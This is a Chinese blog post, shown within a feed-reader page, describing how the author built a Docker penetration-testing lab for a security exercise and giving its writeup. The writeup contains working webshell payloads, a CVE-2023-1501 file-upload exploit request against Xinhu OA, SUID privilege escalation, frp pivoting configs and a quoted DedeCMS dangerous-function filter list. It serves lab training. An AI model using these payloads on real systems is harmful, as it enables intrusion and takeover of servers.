惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

A
About on SuperTechFans
C
Cybersecurity and Infrastructure Security Agency CISA
N
News and Events Feed by Topic
C
Cisco Blogs
Cisco Talos Blog
Cisco Talos Blog
A
Arctic Wolf
Scott Helme
Scott Helme
P
Palo Alto Networks Blog
S
Schneier on Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
Tor Project blog
量子位
G
Google Developers Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
B
Blog RSS Feed
NISL@THU
NISL@THU
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
AWS News Blog
AWS News Blog
爱范儿
爱范儿
Last Week in AI
Last Week in AI
Y
Y Combinator Blog
L
LINUX DO - 最新话题
Security Archives - TechRepublic
Security Archives - TechRepublic
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
S
Secure Thoughts
Cloudbric
Cloudbric
aimingoo的专栏
aimingoo的专栏
L
Lohrmann on Cybersecurity
TaoSecurity Blog
TaoSecurity Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Hacker News: Ask HN
Hacker News: Ask HN
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
The GitHub Blog
The GitHub Blog
有赞技术团队
有赞技术团队
S
Security @ Cisco Blogs
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
C
Cyber Attacks, Cyber Crime and Cyber Security
G
GRAHAM CLULEY
P
Proofpoint News Feed
V
V2EX
Martin Fowler
Martin Fowler
C
CERT Recently Published Vulnerability Notes
Attack and Defense Labs
Attack and Defense Labs
C
CXSECURITY Database RSS Feed - CXSecurity.com
The Cloudflare Blog
SecWiki News
SecWiki News
罗磊的独立博客
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
小众软件
小众软件
The Last Watchdog
The Last Watchdog

Hi, I Am I

[I Am I 年度简报] — 不知终日梦为鱼 初探 ESP32-CAM QQ 聊天记录 MHT 文件转 HTML [I Am I 年度简报] - 草木本无意,荣枯自有时。 Hexo 中实现 Live Photos 支持 写在当下 NKCTF 2024 1z_F0r3ns1c5 Writeup 春秋杯冬季赛 2023 Writeup [I Am I 年度简报] - 2023 某内网渗透内部赛 Writeup 强网拟态 2023 Writeup Github Actions 自动化部署 Hexo 浅析CobaltStrike流量解密 陇剑杯 2023 Writeup CTF线下赛AWDP总结 ISCC 2023 Writeup ISCC 2023 实战题 Writeup CISCN 2023 Writeup 福建闽盾杯网络空间安全大赛 2023 Writeup 天一永安杯宁波市网络安全大赛 2023 Writeup 贵阳大数据及网络安全精英对抗赛 2023 Writeup 红明谷杯 2023 Writeup Confetti 带来有仪式感的鼓励 记一次 JS 逆向密码加密 [I Am I 年度简报] – 2022 PHP 读取 Excel 文件内容并写入数据库 从0开始的 MoeCTF 开发之路 观安杯 2022 Writeup 利用微信服务号实现早安自动化 Cloudflare批量拉黑IP脚本 蓝帽杯 2022 Writeup 为你的网站添加 Do you like me 小组件 ISCC 2022 Writeup CISCN 2022 Writeup ISCC 2022 实战题 Writeup CTF线下赛AWD攻防总结 [I Am I 年度简报] – 2021 记一次 CNVD 通用型漏洞证书挖掘 Google Adsense 收款流程 使用 Digispark 开发板制作 BadUSB 在 Vue 中使用 Axios 获取钉钉群直播回放的 M3U8 地址 Flask 框架学习记录 关于 Ten·API 防火墙的配置 关于最近 关于 Burp Suite 调教这档事 ISCC 2021 Writeup 记一次 CTF 环境和动态独立靶机部署 各大平台图集解析思路 情话总雷同,恨意千万种 HackThisSite Basic Writeup [I Am I 年度简报] - 2020 Kali 设置中文语言和更换镜像源 使用 Python 下载哔哩哔哩视频 PHP使用 CURL 发送网络请求 PHP蓝奏云直链解析源码 从0开始写一个短视频去水印接口 Windows+Ubuntu 双系统之美化 GRUB Windows+Ubuntu 双系统安装 树莓派安装 Aria2 实现24小时不间断的下载机 抖音无水印解析最新PHP源码 API-Admin Ten·API管理后台 树莓派安装 DLNA 实现流媒体服务器 [I Am I 年度简报] - 2019 Hello Hexo Goindex 将 Google Drive 打造成网盘 自用博客评论邮件通知美化模板 使用 IFTTT 长久保留 Google Voice 号码 Telegram MTProxy 代理一键安装脚本 三分钟学会搭建我的世界基岩版服务器 PHP跳转QQ聊天窗口源码 推荐几款开源HTML5(Web)框架 谷歌新出浏览器 Chromium 可以直接翻墙 Live2D!为你的网站添加看板娘 为你的网站添加Gittalk评论 网站数据离奇丢失...... Lsky Pro(兰空图床)—又一款单纯的图床程序 LOL明天解封ヾ(◍°∇°◍)ノ゙ 唔~本站受到DDOS攻击 [I Am I 年度简报] – 2018 死肥宅也要谈恋爱之早安晚安自动化 1024,Hello,world! 宝塔面板 Bt.cn 专业版破解教程 Uptime >>16 years 震惊!坐在家里竟然可以日入百万 免费获取一年的 .ooo 域名 PHP 调用 新浪API 生成短网址 思杰马克丁成 Adobe 中国授权经销商 畅言商业广告上线-去除畅言评论广告 使用网易云音乐官方接口解析VIP音乐 PHP获取QQ昵称和头像API 坦白说查发送人QQ新方法(已失效) 日常水一波 通过微博图片地址溯源上传者 WordPress 评论夜间自动改为必须审核 十步叫你如何无损修复硬盘锁(mbr病毒) [I Am I 年度简报] – 2017 密码破解与心理学 网页屏蔽各种按键的代码分享 网络安全技术专业术语
深信服云对抗靶机设计思路
2024-09-01 · via Hi, I Am I

写在前面

最近应邀参加了深信服云对抗活动,分为 靶机搭建攻击&防御两个阶段。博主负责 靶机搭建 阶段,其中赛方要求

  1. 尽可能地使用 Docker 容器化进行搭建

    环境:Centos 7.6, Docker 20.0

  2. 需要存在内网环境(靶机 A -> 靶机 B)

    其中,靶机 A 对外映射了全部端口,而靶机 B 仅对外映射了 8000-8004 端口。

设计思路

由于整个靶机不出网,所以博主推荐的思路是本地搭建完成之后,将容器导出为 .tar 格式,并通过 SSH 上传至靶机中

docker save -o filename.tar iami233/dedecms:latest 
docker load -i filename.tar

主办方在赛事规则中指出,靶机设计时需要通过控制靶机 A 以实现攻击靶机 B。但博主认为,完全可以利用 Docker 内置的网络划分功能来实现这一目标,所以未完全按照官方要求进行设计。

另外,如果要在多台宿主机之间通过容器化搭建多层渗透环境,博主觉得意义并不大。除非将 Docker 容器置于特权模式下,并实现逃逸至宿主机,以进行提权、搭建跳板等操作,但这可能会让问题变得过于复杂(有些舍本逐末的感觉?)。

因此,博主最终决定全程在靶机 A 中进行靶机的设计。在整套靶机的设计中,博主将最难的点放在了入口(毕竟平时打攻防的时候确实口子难撕🤣),其他三个靶机基本上都是 CVE 漏洞,只要能将隧道搭建出来,基本可以打穿。

由于整个云对抗正值全国常态化护网期间,靶机对外进行了访问收敛,需通过 aTrust 进行中转连接。但攻击机和靶机 A 肯定是互通的,所以整体的设计拓扑如下所示。

名称地址备注
DedeCMS10.23.76.101(入口)/ 192.168.100.2命令执行
信呼OA192.168.100.3 / 10.10.10.2文件上传
Redis10.10.10.3未授权访问
Struts210.10.10.4命令执行

img

靶机启动

这里仅仅给大家提供一下 Docker CLI 和 Docker-compose 的启动示例,具体的镜像地址就不放出来了。

# 创建网络
docker network create --driver bridge --subnet 192.168.100.0/24 entry
docker network create --driver bridge --internal --subnet 10.10.10.0/24 sub-1
# 启动容器
docker run -d --name dedecms --network entry -p 80:80 -e FLAG=flag{test_flag} 镜像名称
docker run -d --name xinhu --network entry -e FLAG=flag{test_flag} 镜像名称
docker network connect sub-1 xinhu
docker run -d --name redis --network sub-1 镜像名称
docker run -d --name struts2 --network sub-1 镜像名称

当然我们也可以手动下载 docker-compose 并上传到靶机后,使用 docker-compose.yaml 来启动容器

# 这里现在本机下载 docker-compose
https://github.com/docker/compose/releases/download/v2.29.2/docker-compose-linux-x86_64
# 然后上传到靶机中,赋予 可执行 的权限
sudo chmod +x /usr/local/bin/docker-compose
# 查看 docker-compose 版本
docker-compose version

具体靶机的启动脚本如下所示

version: "3"
services:
  dedecms:
    build: ./dedecms
    ports:
    - "80:80"
    environment:
      FLAG: "flag{test_flag}"
    networks:
    - entry
  xinhu:
    build: ./xinhu
    environment:
      FLAG: "flag{test_flag}"
    networks:
    - entry
    - sub-1
  redis:
    build: ./redis
    networks:
    - sub-1
  struts2:
    build: ./struts2
    networks:
    - sub-1

networks:
  entry:
    driver: bridge
    ipam:
      config:
      - subnet: 192.168.100.0/24

  sub-1:
    driver: bridge
    internal: true
    ipam:
      config:
      - subnet: 10.10.10.0/24

Writeup

织梦内容管理系统

访问默认路径 /dede 成功进入后台登陆页面。通过网站的文章可以得到作者名,将其当作用户名进行爆破,得到密码 admin

image-20240829162331626

进入后台后利用 文件式管理器新建文件 功能进行 GetShell(这里需要找最新版 DedeCMS 审计一下,其实 CTF 打多了应该也有很多的绕过手法,例如无字母数字RCE、字符拼接等)

// dede/file_manage_control.php
$str = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $str);
global $cfg_disable_funs;
$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfoevalassertexecpassthrushell_execsystemproc_openpopencurl_execcurl_multi_execparse_ini_fileshow_sourcefile_put_contentsfsockopenfopenfwritepreg_replace';
$cfg_disable_funs = $cfg_disable_funs.'[$]GLOBALS[$]_GET[$]_POST[$]_REQUEST[$]_FILES[$]_COOKIE[$]_SERVERincluderequirecreate_functionarray_mapcall_user_funccall_user_func_arrayarray_filertgetallheaders';
foreach (explode("", $cfg_disable_funs) as $value) {
    $value = str_replace(" ", "", $value);
    if (!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
}
if (preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", "{$str}") == TRUE) {
    if (preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
    if (preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
    if (preg_match("#[`][\s\S]*[`]#i", "{$str}") == TRUE) {
        $str = dede_htmlspecialchars($str);
        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$str}</pre>");
    }
}

image-20240803214820450

0=system&1=echo '<?php eval($_POST[1]);?>' > 123.php

写入新木马后,我们直接使用 哥斯拉 连接后进行提权操作。

根目录我放了一个 600 权限的 flag 文件用来引导用户进行提权操作,但是不知道主办方是否允许存在 flag,所以文件没写入内容(整个靶机提权与否不影响往下进行)

/var/www/html >whoami
www-data

/var/www/html >find / -perm -u=s 2>/dev/null
/bin/su
/usr/bin/find
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/expiry
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/mariadb/plugin/auth_pam_tool_dir/auth_pam_tool

/var/www/html >find /tmp -exec whoami \;
root

剩下的就是查看网卡,可以发现存在 192.168.100.0/24 网卡,我们直接上传 fscan 进行信息收集

/var/www/html >ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:C0:A8:64:02  
          inet addr:192.168.100.2  Bcast:192.168.100.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:18293 errors:0 dropped:0 overruns:0 frame:0
          TX packets:14157 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:26051495 (24.8 MiB)  TX bytes:3652659 (3.4 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:11703 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11703 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18055136 (17.2 MiB)  TX bytes:18055136 (17.2 MiB)

/var/www/html >cd /tmp

/tmp >chmod +x fscan

/tmp >./fscan -h 192.168.100.0/24 -hn 192.168.100.2
start infoscan
192.168.100.3:9000 open
192.168.100.3:80 open
[*] alive ports len is: 2
start vulscan
[+] FCGI 192.168.100.3:9000 
Status: 403 Forbidden
X-Powered-By: PHP/7.3.33
Content-type: text/html; charset=UTF-8

Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)
plesa try other path,as -path /www/wwwroot/index.php
[*] WebTitle http://192.168.100.3      code:200 len:42     title:None
[+] PocScan http://192.168.100.3 poc-yaml-php-cgi-cve-2012-1823 

信呼协同办公系统

可以看到下一层存在一个 Web 服务,我们直接搭建代理

# 你自己机器 frps.ini
[common]
server_port = 7000

# 织梦 frpc.ini
[common]
server_addr = 20.1.0.16 # 这里填aTrust分配的IP
server_port = 7000

[plugin_socks6]
type = tcp
remote_port = 7001
plugin = socks5

然后通过 Proxifier 代理出来即可正常访问到信呼协同办公系统

image-20240803221236454

经过测试应该可以发现这里存在一个小小的用户名枚举漏洞,通过该漏洞我们可以确定 admin 用户存在,但是密码爆破未果。

通过目录扫描可以发现存在 adminer,通过弱口令 root:root 成功登录控制面板

image-20240803221718230

image-20240803221757420

通过修改 rockxinhu 数据库中 xinhu_adminadmin 用户的 pass 字段来实现篡改密码(应该一眼能看出来是 md5)

image-20240803221915446

image-20240803222638792

登陆过后,照着 CVE-2023-1501 漏洞进行复现即可实现 getshell

image-20240803222738409

POST /index.php?a=upfile&m=upload&d=public&maxsize=2&ajaxbool=true&rnd=395715 HTTP/1.1
Host: 192.168.100.3
Content-Length: 225
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTUHp3yo6lIJsYU3o
Accept: */*
Origin: http://192.168.100.3
Referer: http://192.168.100.3/index.php?m=upload&d=public&callback=&upkey=20240803222857263101&showid=fileidview
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=349e6ea884663131a41d928c0e5d1ae7; deviceid=1722695306459; xinhu_mo_adminid=zz0ltt0vt0kh0zz0vv0wk0ltt0zv0vz0llc0kv04; xinhu_ca_adminuser=admin; xinhu_ca_rempass=0
Connection: close

------WebKitFormBoundaryTUHp3yo6lIJsYU3o
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php @eval(@$_POST[cmd]);?>
------WebKitFormBoundaryTUHp3yo6lIJsYU3o--

image-20240803222956897

抓包上传后可以得到文件的 上传路径 以及 文件id

path: upload/2024-08/03_22291046.uptemp
id: 8

我们在通过另一个接口来将 uptemp 后缀更换为 php,后面直接用源路径(需更改后缀)连接一句话木马即可

GET /task.php?m=qcloudCos|runt&a=run&fileid=8 HTTP/1.1
Host: 192.168.100.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: */*
Origin: http://192.168.100.3
Referer: http://192.168.100.3/index.php?m=upload&d=public&callback=&upkey=20240803222857263101&showid=fileidview
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=349e6ea884663131a41d928c0e5d1ae7; deviceid=1722695306459; xinhu_mo_adminid=zz0ltt0vt0kh0zz0vv0wk0ltt0zv0vz0llc0kv04; xinhu_ca_adminuser=admin; xinhu_ca_rempass=0
Connection: close

image-20240803223332415

这里也是同样留了一个 /flag 来引导用户进行提权

/app/upload/2024-08/ >find / -perm -u=s 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/tmp/.backdoor
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd

/tmp >cd /tmp
/tmp >./.backdoor
Usage: ./.backdoor <command>

/tmp >./.backdoor 'whoami'
root

下面就是老样子,看看有没有多个网卡然后进行信息收集

/app/upload/2024-08/ >ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
629: eth0@if630: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c0:a8:64:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.100.3/24 brd 192.168.100.255 scope global eth0
       valid_lft forever preferred_lft forever
631: eth1@if632: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:0a:0a:0a:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.10.10.2/24 brd 10.10.10.255 scope global eth1
       valid_lft forever preferred_lft forever
       
/app/upload/2024-08/ >cd /tmp

/tmp >chmod +x fscan

/tmp >./fscan -h 10.10.10.0/24 -hn 10.10.10.2
start infoscan
10.10.10.3:6379 open
10.10.10.4:8009 open
10.10.10.4:8080 open
[*] alive ports len is: 3
start vulscan
[+] Redis 10.10.10.3:6379 unauthorized file:/data/dump.rdb
[*] WebTitle http://10.10.10.4:8080    code:200 len:90     title:$Title$
[+] PocScan http://10.10.10.4:8080 poc-yaml-struts2_045 poc

Redis 未授权访问

# 织梦 frps.ini
[common]
server_port = 7000

# 信呼 frpc.ini
[common]
server_addr = 192.168.100.2
server_port = 7000

[plugin_socks6]
type = tcp
remote_port = 7001
plugin = socks5

这里可以看到直接可以进行未授权访问(也可以通过 主从复制 实现 RCE

image-20240803225657470

S2-046 命令执行

直接工具一键梭了,由于这里得到的直接就是 root 权限所以无需提权

image-20240803230750008

写在后面

当时正忙着教育攻防演练,所以整体靶机搭建的时候十分仓促,用了不到两天的时间。但没想到后面突然延期了好久,但是也懒得改了…

在后期,群里其他师傅分享了一篇 记一次深信服云对抗环境搭建思路分享,看过之后确实大家的思路各不相同,通过宝塔来搭建是博主从未设想过的道路。不过宝塔 PHP 默认过滤了很多危险函数,可能会影响选手判断…